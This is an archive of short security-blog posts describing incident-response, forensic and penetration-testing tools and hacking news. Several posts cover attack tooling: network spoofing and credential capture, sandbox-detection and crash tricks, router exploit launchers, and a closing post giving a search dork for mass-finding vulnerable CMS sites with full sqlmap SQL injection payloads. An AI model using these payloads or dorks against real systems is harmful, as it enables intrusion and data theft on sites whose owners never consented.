CimSweep: Incident Response hunting Remotely

CimSweep is a suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows. CimSweep may also be used to engage in offensive reconnaisance without the need to drop any payload to disk. Windows Management Instrumentation has been installed and its respective service running by default since Windows XP and Windows 2000 and is fully supported in the latest versions of Windows including Windows 10, Nano Server, and Server 2016.

Background

Agent-based defensive tools are extremely powerful but they also require deployment of the agent to each system. While agent-based solutions absolutely have a place in our industry, they tend to be very expensive and can be easily detected/thwarted by determined attackers. CimSweep enables the acquisition of time-sensitive data at scale all without needing to deploy an agent.

It is called CimSweep based upon the fact that it utilizes the extremely powerful CIM cmdlets in PowerShell. CIM cmdlets support the WSMan protocol by default but it may also fall back to using DCOM on systems that either cannot support or do not have the Windows Remote Management (WinRM) service enabled. More information on the CIM cmdlets may be found here:

• Introduction to CIM Cmdlets
• What is CIM and Why Should I Use It in PowerShell?

One of the greatest features of the CIM cmdlets is that they allow you to establish a CIM session which can survive reboots. CIM sessions speed up remote queries and they enable an analyst to establish a session once and then can be passed around to any function that supports a -CimSession parameter - which all CimSweep functions support by design.

Requirements

Analyst system

1. PowerShell version 3 or above is required. The CIM cmdlets were introduced in PSv3.
2. Elevated credentials to the target hosts. By default, all remote WMI/CIM operations require credentials for users belonging to the Administrator's group.

Target hosts

1. Any Windows OS dating back to Windows XP or Windows 2000.
2. The WMI service (winmgmt) must be running. It is running by default.
3. Host and network firewalls must allow remote WMI/CIM management ports through.
   • Connecting to WMI Remotely Starting with Windows Vista
4. For systems where the WSMan protocol is desired, the WinRM service must be running. If PowerShell remoting is already enabled, the WinRM service will already be running. WinRM can be enabled locally with PowerShell or remotely in an enterprise with GPO.
   • Enable and configure Windows PowerShell Remoting using Group Policy
   • WSMan service configuration using domain GPO
   • WSMan Provider

CimSweep is comprised of two components: core functionality and domain specific functionality.

Core Functionality

At its core, CimSweep makes it easy to remotely obtain the following information from any Windows operating system:

• Registry keys, values, value types, and value content with optional recursion
• Directory and file listing with optional recursion
• Event log entries
• Services
• Processes

This core functionality was designed to facilitate the development of domain-specific functionality for incident responders, hunt operators, or anyone else needing to target information remotely over WMI.

Read more at

Read more

by Malik korrich ~ lundi 23 mai 2016 0 commentaires

UK Government And GCHQ Are Investing £6.5m For Cyber Security

UK Government And GCHQ Are Investing £6.5m For Cyber Security. 

Cyber Analytics , Cloud protection and  the internet of things (IoT) are the most investment areas.

CyberInvest is about bringing together academia, industry and government to address the critical shortage of high-end cyber research in a more focused way," said GCHQ director Robert Hannigan during the annual IA15 conference in London.

According to Professor Angela Sasse, head of IT at University College London (UCL), a key benefit of the scheme for academia will be access to data held by GCHQ.

"To do effective research we need access to data in order to study the impact of the new ideas and new technologies that we are developing," she said.

"Sometimes the impression is that all academics want is more money. But in the cyber security space it's very important to realise it's not just about money."

However, while Sasse acknowledged that it may take some time for government and academia to figure out how to work well together she maintained they are natural allies.

"Academia will always be a friend of the government and industry but sometimes it has to be a critical friend," Sasse said.

This Joint program will help to fight and monitor by Cyber Crime.

Source: V3

Read more

by Malik korrich ~ mardi 10 novembre 2015 0 commentaires

Police Arrested Second Teenager Over TalkTalk Hack

Second Teenager Arrested Over TalkTalk Hack.

Last week 4 Million Customers of UK based company TalkTalk Data have been breached.

According to Press Release from Metropolitan Police,

Police have arrested a second teenage boy in connection with the investigation into alleged data theft from TalkTalk.

On Thursday, 29 October, detectives from the Metropolitan Police Cyber Crime Unit (MPCCU) executed a search warrant at an address in Feltham. At the address, a 16-year-old boy was arrested on suspicion of Computer Misuse Act offences. He has now been bailed - we await confirmation of the bail date.

A search of the residential address in Feltham has been completed. Officers have also searched a residential address in Liverpool.

Enquiries by the MPCUU supported by officers from the National Crime Agency (NCA) continue.

A 15-year-old boy from County Antrim, Northern Ireland, was arrested on Monday, 26 October, by officers from the Police Service of Northern Ireland (PSNI), working with detectives from the Cyber Crime Unit on suspicion of Computer Misuse Act offences.

He was taken into custody at a County Antrim police station and has since been bailed to a date in November.

Detectives from the MPCCU continue to investigative and have launched a joint investigation with the PSNI's Cyber Crime Centre (CCC) and the NCA. "


The Hacker News reported the first arrest, 15 years Old boy from County Antrim was arrested.

Within a week, police arrested teenager over TalkTalk hack. Investigation is still ongoing.
Company shares dropped down after the cyber attack on the company.

Read more

by Malik korrich ~ vendredi 30 octobre 2015 0 commentaires

Sniffly To Sniffing Browser History Using HSTS And CSP

Sniffly Trick For Browser Fingerprinting. Sniffing browser history using HSTS + CSP.

Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome.

How it works

I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version:

1. User visits Sniffly page
2. Browser attempts to load images from various HSTS domains over HTTP
3. Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completes a request to the HTTPS site, then it will receive the HSTS pin, and the attack will no longer work when the user visits Sniffly.
4. When an image gets blocked by CSP, its onerror handler is called. In this case, the onerror handler does some fancy tricks to time how long it took for the image to be redirected from HTTP to HTTPS. If this time is on the order of a millisecond, it was an HSTS redirect (no network request was made), which means the user has visited the image's domain before. If it's on the order of 100 milliseconds, then a network request probably occurred, meaning that the user hasn't visited the image's domain.

Finding HSTS hosts

To scrape an included list of sites (util/strict-transport-security.txt, courtesy Scott Helme) to determine which hosts send HSTS headers, do:

$ cd util
$ ./run.sh > results.log

where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want.

To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded:

$ cd util
$ ./process.py > processed.log

Once that's done, you can copy the hosts from processed.log into src/index.js.

Running sploitz

Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP headers using the tag are apparently not supported yet, so you need to set up a local webserver to serve the CSP HTTP response header. My Nginx server block looks something like this:

server {
    listen 8081;
    server_name localhost;
    location / {
        root /path/to/sniffly/src;
        add_header Content-Security-Policy "img-src http://*";
        index index.html;
    }
}

Caveats

Not supported yet in Safari, IE, or Chrome on iOS.
Extensions such as HTTPS Everywhere will mess up results.
Doesn't work reliably in Tor Browser since timings are rounded to the nearest 100-millisecond.
Users with a different HSTS preload list (ex: due to having an older browser) may not see accurate results.

More info available in my ToorCon 2015 slides: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf.

Demo

Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them).

Download

Read more

by Malik korrich ~ lundi 26 octobre 2015 0 commentaires

Mobile Security: How to Secure, Privatize, and Recover Your Devices (A $26.99 Value!) Free eBook For A Limited Time

Mobile Security: How to Secure, Privatize, and Recover Your Devices (A $26.99 Value!) Free eBook for a limited time

Learn how to keep your data secure when you’re on the go.

Mobile phones and tablets enhance our lives, but they also make you and your family vulnerable to cyber-attacks or theft. This clever eBook will help you secure your devices and know what to do if the worst happens.

Download

Read more

by Malik korrich ~ jeudi 22 octobre 2015 0 commentaires

MEMSCAN A Memory Scanning Tool For A Specific Sequence of Bytes

MEMSCAN A Memory Scanning Tool.. 
For A Specific Sequence of Bytes!

A memory scanning tool which uses mach_vm* to either dump memory or look for a specific sequence of bytes.
To build MEMSCAN, you will need to have the OS installed. Well, you don't really need it but it makes life easier.

Once Theos is installed, simply navigate to the MEMSCAN folder in terminal and run:

make package install

Usage

Dumping the memory of a process

1. Obtain the target process PID, using ps.
2. Provide the PID to memscan:

./memscan -p -d

Finding objects in memory

Open your target app or process in a disassembler, grab first ~16 bytes (customise this number as you will) of the method you want to hook and these bytes will be your "signature".

Write the signature to a file, make sure to encode the bytes like so:

echo -n -e '\x55\x48\x89\xE5\xB8\x15\x00\x00\x00\x5D' > needle

Run the scanner against the target process. It will locate the signature in memory and print it's address. The signature has to be passed in as bytes, not a literal string so use the scanner as shown:

./memscan -p -s  

e.g:

./memscan -p 1234 -s ./needle

MEMSCAN should then print the address where the needle is located in memory.


Download

Read more

by Malik korrich ~ lundi 5 octobre 2015 0 commentaires

Thug: A Tool For Python Low-Interaction Honeyclient

Thug: A Tool For Python Low-Interaction Honeyclient

Thug is a Python low-interaction honeyclient aimed at mimicing the behavior of a web browser in order to detect and emulate malicious contents.

The number of client-side attacks has grown significantly in the past few years shifting focus on poorly protected vulnerable clients. Just as the most known honeypot technologies enable research into server-side attacks, honeyclients allow the study of client-side attacks.

A complement to honeypots, a honeyclient is a tool designed to mimic the behavior of a user-driven network client application, such as a web browser, and be exploited by an attacker's content.


Download

Read more

by Malik korrich ~ mercredi 30 septembre 2015 0 commentaires

How To Test Security in IPv4 and IPv6 Data Networks?

How To Test Security in IPv4 and IPv6 Data Networks ?

Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks. 

Compared to IPv4 address space is 32 bits which resulting 4 billion addresses.IPv6 offers larger address space. Its addresses are 128 bits long, resulting in an address space of 340 undecillion addresses.


In addition, IPv6 provides other technical benefits, particularly, it permits hierarchical address allocation methods that facilitate route aggregation across the Internet, and thus limit the expansion of routing tables. The use of multicast addressing is expanded and simplified, and provides additional optimization for the delivery of services. Device mobility, security, and configuration aspects have been considered in the design of the protocol.

The tool is capable of carrying out various attacks such as:

• MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection.
• MITM on IPv6 networks with Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
• DoS (Denial of Service) on IPv4 networks with ARP Spoofing.
• DoS (Denial of Service) on IPv6 networks with SLAAC DoS.
• DNS Hijacking.

The software automatically scans the networks and identifies all devices and their respective network interfaces, specifying their IPv4 and IPv6 addresses as well as the physical addresses through a convenient and intuitive interface.

Man In The Middle (MITM) attack

The well-known “Man In The Middle” is an attack in which the wrongdoer creates the possibility of reading, adding, or modifying information that is located in a channel between two terminals with neither of these noticing. Within the MITM attacks in IPv4 and IPv6 Evil Foca considers the following techniques:

ARP Spoofing: Consists in sending ARP messages to the Ethernet network. Normally the objective is to associate the MAC address of the attacker with the IP of another device. Any traffic directed to the IP address of the predetermined link gate will be erroneously sent to the attacker instead of its real destination.

DHCP ACK Injection: Consists in an attacker monitoring the DHCP exchanges and, at some point during the communication, sending a packet to modify its behavior. Evil Foca converts the machine in a fake DHCP server on the network.

Neighbor Advertisement Spoofing: The principle of this attack is identical to that of ARP Spoofing, with the difference being in that IPv6 doesn’t work with the ARP protocol, but that all information is sent through ICMPv6 packets. There are five types of ICMPv6 packets used in the discovery protocol and Evil Foca generates this type of packets, placing itself between the gateway and victim.

SLAAC attack: The objective of this type of attack is to be able to execute an MITM when a user connects to Internet and to a server that does not include support for IPv6 and to which it is therefore necessary to connect using IPv4. This attack is possible due to the fact that Evil Foca undertakes domain name resolution once it is in the communication media, and is capable of transforming IPv4 addresses in IPv6.

Fake DHCPv6 server: This attack involves the attacker posing as the DCHPv6 server, responding to all network requests, distributing IPv6 addresses and a false DNS to manipulate the user destination or deny the service.

Denial of Service (DoS) attack: The DoS attack is an attack to a system of machines or network that results in a service or resource being inaccessible for its users. Normally it provokes the loss of network connectivity due to consumption of the bandwidth of the victim’s network, or overloads the computing resources of the victim’s system.

DoS attack in IPv4 with ARP Spoofing: This type of DoS attack consists in associating a nonexistent MAC address in a victim’s ARP table. This results in rendering the machine whose ARP table has been modified incapable of connecting to the IP address associated to the nonexistent MAC.
DoS attack in IPv6 with SLAAC attack: In this type of attack a large quantity of “router advertisement” packets are generated, destined to one or several machines, announcing false routers and assigning a different IPv6 address and link gate for each router, collapsing the system and making machines unresponsive.

DNS Hijacking: The DNS Hijacking attack or DNS kidnapping consists in altering the resolution of the domain names system (DNS). This can be achieved using malware that invalidates the configuration of a TCP/IP machine so that it points to a pirate DNS server under the attacker’s control, or by way of an MITM attack, with the attacker being the party who receives the DNS requests, and responding himself or herself to a specific DNS request to direct the victim toward a specific destination selected by the attacker.

Download

Read more

by Malik korrich ~ mardi 29 septembre 2015 0 commentaires

Top 3 Forensic Examination Tools for Linux

Computer forensics and evidence management are the most important topic and very important aspect, when we talk about computer crimes. Ethical hacking and intrusion management used to protect the system, but if the incident happened, then you need to investigate it. Here computer forensic comes. We have also created a free computer forensics training course for everyone to get the basic understanding of the process, methodology and tools used while conducting a digital investigation.

Anyway, in this story, you will find the basic introduction of the top 3 forensic tools.

The Sleuthkit & Autopsy

For detail tutorial, please join the free forensics class here.

www.sleuthkit.org

The Sleuthkit is a free open source suite of forensic utilities that has a GUI called Autopsy. This tool suite has strong support for Linux file systems and can be used to examine the full details of inodes and other data structures. The Sleuthkit has a plugin framework that supports automated processing. The Autopsy GUI for The Sleuthkit is shown here with a Linux file system:

Digital Forensics Framework

For detail tutorial, please join the free forensics class here:

http://www.digital-forensic.org/

DFF (Digital Forensics Framework) is a free and Open Source computer forensics software built on top of a dedicated Application Programming Interface (API).

•     Preserve digital chain of custody: Software write blocker, cryptographic hash calculation
•     Access to local and remote devices: Disk drives, removable devices, remote file systems
•     Read standard digital forensics file formats: Raw, Encase EWF, AFF 3 file formats
•     Virtual machine disk reconstruction: VmWare (VMDK) compatible
•     Windows and Linux OS forensics: Registry, Mailboxes, NTFS, EXTFS 2/3/4, FAT 12/16/32 file systems
•     Quickly triage and search for (meta-)data: Regular expressions, dictionaries, content search, tags, time-line
•     Recover hidden and deleted artifacts: Deleted files / folders, unallocated spaces, carving
•     Volatile memory forensics: Processes, local files, binary extraction, network connections

SMART for Linux

http://www.asrdata.com

SMART is a software utility that has been designed and optimized to support data forensic practitioners and Information Security personnel in pursuit of their respective duties and goals.

SMART is more than a stand-alone data forensic program. The features of SMART allow it to be used in many scenarios, including:

•    “Knock-and-talk” inquiries and investigations
•     on-site or remote preview of a target system
•     post mortem analysis of a dead system
•     testing and verification of other forensic programs
•     conversion of proprietary “evidence file” formats
•     baselining of a system

Conclusion:

No matter what tool or set of tools are you using, the approach is very important. Your methodology, process, chain of custody and maintaining the integrity of the data is crucial, otherwise you will have nothing in your hands as an evidence. So training is crucial, you need to develop your profile and you need to work with your master so that you will become the master.

Join the Free Computer Forensics Class started by Ehacking!

Read more

by Malik korrich ~ mardi 15 septembre 2015 0 commentaires

AIDE (Advanced Intrusion Detection Environment) To Verify The Integrity Of Files

AIDE (Advanced Intrusion Detection Environment) To Verify The Integrity Of Files

AIDE is a file and directory integrity checker.

What does it do?

It creates a database from the regular expression rules that it finds from the config file(s). Once this database is initialized it can be used to verify the integrity of the files. It has several message digest algorithms (see below) that are used to check the integrity of the file. All of the usual file attributes can also be checked for inconsistencies. It can read databases from older or newer versions. See the manual pages within the distribution for further info.

Features

• supported message digest algorithms: md5, sha1, rmd160, tiger, crc32, sha256, sha512, whirlpool (additionally with libmhash: gost, haval, crc32b)
• supported file attributes: File type, Permissions, Inode, Uid, Gid, Link name, Size, Block count, Number of links, Mtime, Ctime and Atime
• support for Posix ACL, SELinux, XAttrs and Extended file system attributes if support is compiled in
• plain text configuration files and database for simplicity
• powerful regular expression support to selectively include or exclude files and directories to be monitored
• gzip database compression if zlib support is compiled in
• stand alone static binary for easy client/server monitoring configurations

AIDE is included in the following distributions. Please use the corresponding command to install AIDE.

• Debian GNU/Linux | Ubuntu: apt-get install aide or aptitude install aide
• Gentoo: emerge aide
• MacPorts: port install aide
• FreeBSD: pkg_add -r aide
• Red Hat | CentOS | Fedora: yum install aide
• openSUSE: zypper install aide
• IPCop: see here for installation guidelines

Download

Read more

by Malik korrich ~ lundi 14 septembre 2015 0 commentaires

SONAR: A Framework For Identifying And Launching Exploits Against Internal Network Hosts

SONAR: A Framework For Identifying And Launching Exploits Against Internal Network Hosts

Works via WebRTC IP scanning combined with external resource fingerprinting.

How does it work?

Upon loading the sonar payload in a modern web browser the following will happen:

• sonar will use WebRTC to scan the internal network for live hosts.
• If a live host is found, sonar begins to attempt to fingerprint the host by linking to it via and and hooking the onload event. If the expected resources load successfully it will trigger the pre-set JavaScript callback to start the user-supplied exploit.
• If the user changes networks, sonar starts the process all over again on the newly joined network.

Fingerprints

Sonar works off of a database of fingerprints. A fingerprint is simply a list of known resources on a device that can be linked to and detected via onload. Examples of this include images, CSS stylesheets, and even external JavaScript.

An example fingerprint database can be seen below:

var fingerprints = [
    {
        'name': "ASUS RT-N66U",
        'fingerprints': ["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
    {
        'name': "Linksys WRT54G",
        'fingerprints': ["/UILinksys.gif","/UI_10.gif","/UI_07.gif","/UI_06.gif","/UI_03.gif","/UI_02.gif","/UI_Cisco.gif","/style.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
]

The above database contains fingerprints for two devices, the ASUS RT-N66U WiFi router and the Linksys WRT54G WiFi router.

Each database entry has the following:

• name: A field to identify what device the fingerprint is for. This could be something like HP Officejet 4500 printer or Linksys WRT54G Router.
• fingerprints: This is an array of relative links to resources such as CSS stylesheets, images, or even JavaScript files. If you expect these resources to be on a non-standard port such as 8080, set the resource with the port included: :8080/unique.css. Keep in mind using external resources with active content such as JavaScript is dangerous as it can interrupt the regular flow of execution.
• callback: If all of these resources are found to exist on the enumerated host then the callback function is called with a single argument of the device's IP address.
• By creating your own fingerprints you can build custom exploits that will be launched against internal devices once they are detected by sonar. Common exploits include things such as Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. The idea being that you can use these vulnerabilities to do things such as modifying router DNS configurations, dumping files from an internal fileserver, and more.

For an easier way to create fingerprints, see the following Chrome extension which generates fingerprint template code automatically for the page you're on:

Click Here to Install Chrome Extension

What can be done using sonar?

By using sonar a pentesting team can build web exploits against things such as internal logging servers, routers, printers, VOIP phones, and more. Due to internal networks often being less guarded, attacks such as CSRF and XSS can be powerful to take over the configurations of devices on a hosts internal network.

Download

Read more

by Malik korrich ~ lundi 24 août 2015 0 commentaires

BinNavi A Binary Analysis IDE To Control Disassembled Code

BinNavi: A Binary Analysis IDE To Control Disassembled Code

BinNavi is a binary analysis IDE that allows to inspect, navigate, edit and annotate control flow graphs and call graphs of disassembled code.

BinNavi is a binary analysis IDE - an environment that allows users to inspect, navigate, edit, and annotate control-flow-graphs of disassembled code, do the same for the callgraph of the executable, collect and combine execution traces, and generally keep track of analysis results among a group of analysts.

Complications from a third-party dependency
BinNavi uses a commercial third-party graph visualisation library (yFiles) for displaying and laying out graphs. This library is immensely powerful, and not easily replaceable.

In order to perform direct development using yFiles, you need a developer license for it. At the same time, we want the community to be able to contribute to BinNavi without needing a commercial yFiles license. In order to do this and conform to the yFiles license, all interfaces to yFiles need to be properly obfuscated.

In order to achieve this, we did the following:

1) BinNavi and all the libraries have been split into two: The parts of the project that directly depend on yFiles were split into subpackages called "yfileswrap":

com.google.security.zynamics.binnavi
com.google.security.zynamics.binnavi.yfileswrap
com.google.security.zynamics.zylib
com.google.security.zynamics.zylib.yfileswrap
com.google.security.zynamics.reil
com.google.security.zynamics.reil.yfileswrap

We are distributing a pre-built JAR file with all the code in the "yfileswrap" subpackages - pre-linked and obfuscated against yFiles. If you wish to change or add code in BinNavi and do not have a yFiles license, you can freely do pretty much whatever you want in the non-yfileswrap packages - you can simply put the lib/yfileswrap-obfuscated.jar into your classpath to test and see the results.

If you wish to make changes to the "yfileswrap" subdirectories, please be aware that you will need a valid yFiles license - and any contribution that you make to the BinNavi project has to honor their license agreement. This means that you can't simply expose their inner APIs under different names etc.

We will enforce this - we're very happy to have found a way to open-source BinNavi with the yFiles dependency, and we will make sure that any code we pull in respects the yFiles license.

Building BinNavi from scratch
BinNavi uses Maven for its dependency management, but not for the actual build yet. To build from scratch use these commands:

mvn dependency:copy-dependencies
ant -f src/main/java/com/google/security/zynamics/build.xml \
  build-binnavi-fat-jar

Running BinNavi for the first time
Please be aware that BinNavi makes use of a central PostgreSQL database for storing disassemblies/comments/traces - so you need to have such an instance running somewhere accessible to you. You can build/launch BinNavi as follows:

ant -f src/main/java/com/google/security/zynamics/build.xml \
  build-binnavi-fat-jar
java -jar target/binnavi-all.jar


Loading the project into Eclipse

Loading the code into Eclipse for further development requires a little bit of configuration.

1. Download the dependencies (as described above) and make sure you have a Java SDK with 1.8 language compliance installed.
2. Create a new "Java Project From Existing Ant Buildfile" and use the file src/main/java/com/google/security/zynamics/build.xml
3. Select '"javac" task found in target "build-binnavi-jar"
4. Open the "Project Properties" dialog.
5. Edit the source folders to have the following properties:
6. Linked Folder Location: $SRCDIR/src/main/java
7. Folder Name: java
8. Click on "Next"
9. Add binnavi/yfileswrap, zylib/yfileswrap, and reil/yfileswrap to the list of directories to exclude.
10. Go to Run->Debug Configurations, select "Java Application" and then search for "CMain".
11. You should be ready to go from here.

Exporting disassemblies from IDA
As part of this project, we are distributing a binary-only (sorry!) IDA pro plugin that exports disassemblies from IDA into the Postgresql database format that BinNavi requires. When running BinNavi, simply configure the right path for IDA, click on the "install plugin" button if necessary -- you should now be able to import disassemblies.

Using other disassemblers than IDA
Right now, we only have the IDA export plugin - but we are hoping very much that someone will help us build export functionality for other disassemblers in the near future.

website: http://www.zynamics.com/binnavi.html

Download

Read more

by Malik korrich ~ jeudi 20 août 2015 0 commentaires

PortDog: Port Scanning Tool In Python

PortDog: Port Scanning Tool In Python

PortDog is a network anomaly detector aimed to detect port scanning techniques. It is entirely written in python and has easy-to-use interface. 

It was tested on Ubuntu 15. Please note that, it is not working on Windows OS due to suffering from capturing RAW packets.I am working on to write this script to work both platforms. In future , I'm thinking about adding firewall options that could block malicious attempts. It is using Raw packets for analysis. For this reason, please ensure that you have run this script from privileged session.


Usage:

sudo python portdog.py -t time_for_sniff_in_minutes

For example, if you want to detect for 5 minutes use:

sudo python portdog.py -t 5

For infinite detection use:

sudo python portdog.py -t 0

If you want to get list of scanned ports , press CTRL+C to get port list at runtime (If scan was happened).

Download

Read more

by Malik korrich ~ vendredi 14 août 2015 0 commentaires

Inveigh: A Windows PowerShell LLMNR/NBNS Spoofer With Challenge/Response Capture Over HTTP/SMB

Inveigh: A Windows PowerShell LLMNR/NBNS Spoofer With Challenge/Response Capture Over HTTP/SMB.

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system.

This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.

Notes

1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture.
2. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
3. SMB challenge/response captures are performed by sniffing over the host system's SMB service.
4. HTTP challenge/response captures are performed with a dedicated listener.
5. The local LLMNR/NBNS services do not need to be disabled on the host system.
6. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
7. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
8. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
9. Output files will be created in current working directory.
10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.

Usage
Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass script execution policy.

To execute with default settings:
Inveigh.ps1 -i localip

To execute with features enabled/disabled:
Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N


Download

Read more

by Malik korrich ~ jeudi 30 juillet 2015 0 commentaires

Google (GRR) Rapid Response - Incident Response Framework

GRR consists of an agent (client) that can be deployed to a target system, and server infrastructure that can manage and talk to the agent.

Client Features:

• Cross-platform support for Linux, Mac OS X and Windows clients.
• Live remote memory analysis using open source memory drivers for Linux, Mac OS X and Windows, and the Rekall memory analysis framework.
• Powerful search and download capabilities for files and the Windows registry.
• Secure communication infrastructure designed for Internet deployment.
• Client automatic update support.
• Detailed monitoring of client CPU, memory, IO usage and self-imposed limits.

Server Features:

• Fully fledged response capabilities handling most incident response and forensics tasks.
• OS-level and raw file system access, using the SleuthKit (TSK).
• Enterprise hunting (searching across a fleet of machines) support.
• Fully scalable back-end to handle very large deployments.
• Automated scheduling for recurring tasks.
• Fast and simple collection of hundreds of digital forensic artifacts.
• Asynchronous design allows future task scheduling for clients, designed to work with a large fleet of laptops.
• Ajax Web UI.
• Fully scriptable IPython console access.
• Basic system timelining features.
• Basic reporting infrastructure.

 

Requirements

• A linux box. At the moment the full install is thoroughly tested end to end on Ubuntu Server 14.04 64-bit [1]. It works on other things fine [2], but that is what it’s tested on.
  
• Recommend > 1GB Ram and a modern CPU if you want to run everything on one box (note that free Amazon EC2 instances don’t have enough RAM).
  
• Some clients to talk to the server. OSX, Windows and Linux agents are supported.
  

Making it Go

Download the installation script e.g. using wget:

wget https://raw.githubusercontent.com/google/grr/master/scripts/install_script_ubuntu.sh

Run the installation script:

sudo bash install_script_ubuntu.sh

Read more at:

Read more

by Malik korrich ~ samedi 27 juin 2015 0 commentaires

A Tool To Detect And Crash Cuckoo Sandbox

A Tool To Detect And Crash Cuckoo Sandbox.
Tested in Cuckoo Sandbox Official and Accuvant version!

Features

Detection:

• Cuckoo hooks detection (all kind of cuckoo hooks).
• Suspicius data in own memory (without APIs, page per page scanning).

Crash (Execute with arguments) (out of a sandbox these args dont crash the program):

• -c1: Modify the RET N instruction of a hooked API with a higher value. Next call to API pushing more args into stack. If the hooked API is called from the Cuckoo's HookHandler the program crash because it only pushes the real API args then the modified RET N instruction corrupt the HookHandler's stack.
• The overkill methods can be useful. For example using the overkill methods you have two features in one: detection/crash and "a kind of Sleep" (Cuckoomon bypass long Sleeps calls).

TODO list

Cuckoo Detection

Submit Release/anticuckoo.exe to analysis in Cuckoo Sandbox. Check the screenshots (console output). Also you can check Accesed Files in Sumary:

Accesed Files in Sumary (django web):

Cuckoo Crash

Specify in submit options the crash argument, ex -c1 (via django web):

And check Screenshots/connect via RDP/whatson connection to verify the crash. Ex -c1 via RDP:

TODO

• Python process & agent.py detection - 70% DONE
• Improve hook detection checking correct bytes in well known places (Ex Native APIs always have the same signatures etc.).
• Cuckoo's TLS entry detection.

Download

Read more

by Malik korrich ~ jeudi 25 juin 2015 0 commentaires

#Breaking: US Army Official Website Hacked By Syrian Electronic Army

#Breaking: US Army Official Website Hacked By Syrian Electronic Army.

Syrian Electronic Army SEA Hacked US Army Website www.army.mil. SEA reports about hacks on their Twitter account.

One of #SEA messages left on the US Army website. #SEA #USArmy pic.twitter.com/jIA7HN9jXt

— SyrianElectronicArmy (@Official_SEA16) June 8, 2015

They have posted screen shot.

The #SEA hacks the official website of the US Army and leave several messages on it | http://t.co/Q93FQFg3cG pic.twitter.com/e8ZXp58oAY

— SyrianElectronicArmy (@Official_SEA16) June 8, 2015

SEA also share the screenshot of US army website admin Panel

#SEA pic.twitter.com/hl5PNa9tNn

— SyrianElectronicArmy (@Official_SEA16) June 8, 2015

We just check the site is offline now. www.army.mil

Read more

by Malik korrich ~ lundi 8 juin 2015 0 commentaires

Router Exploitation Toolkit - REXT

Router Exploitation Toolkit - REXT
Small toolkit for easy creation and usage of various python scripts that work with embedded devices.

• core - contains most of toolkits basic functions
• databases - contains databases, like default credentials etc.
• interface - contains code that is being used for the creation and manipulation with interface
• modules - contains structure of modules, that can be loaded, every module contains vendor specific sub-modules where scripts are stored.

1. decryptors
2. exploits
3. harvesters
4. misc
5. scanners

• output - output goes here
• This is still heavy work-in progress

Requirements
Trying to keep the requirements minimal:

httplib2

License
This software is licensed under GNU GPL v3.

Download

Read more

by Malik korrich ~ mercredi 3 juin 2015 0 commentaires

Exploring CMS With SQLMap + INURL BR Mass

Exploring CMS With SQLMap + INURL BR Mass

In this article we explore one SQLI pattern in the CMS one of the company. Let's use sqlmap for SQL injection and Scanner INURL to seek mass targets.

For those not familiar with this tool was developed by a HackersOnlineClub member (Cleiton Pinheiro). In order to automate detailed filters with search engines using special digital & security search operators.

[+] Dork:      
intext:"Aadi" & inurl:"page.php?id="

[+] POC:      
http://www.target.com/page.php?id=1+XPL_SQLI

[+] Exploit:
DEBUG: sqlmap  

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1630=1630 AND 'DBoa'='DBoa
Vector: AND [INFERENCE]

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 3932 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(3932=3932,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wUln'='wUln
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(10)))HrzP) AND 'jmET'='jmET
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x465169724a72556d4e4f,0x716a6b7071),NULL-- 

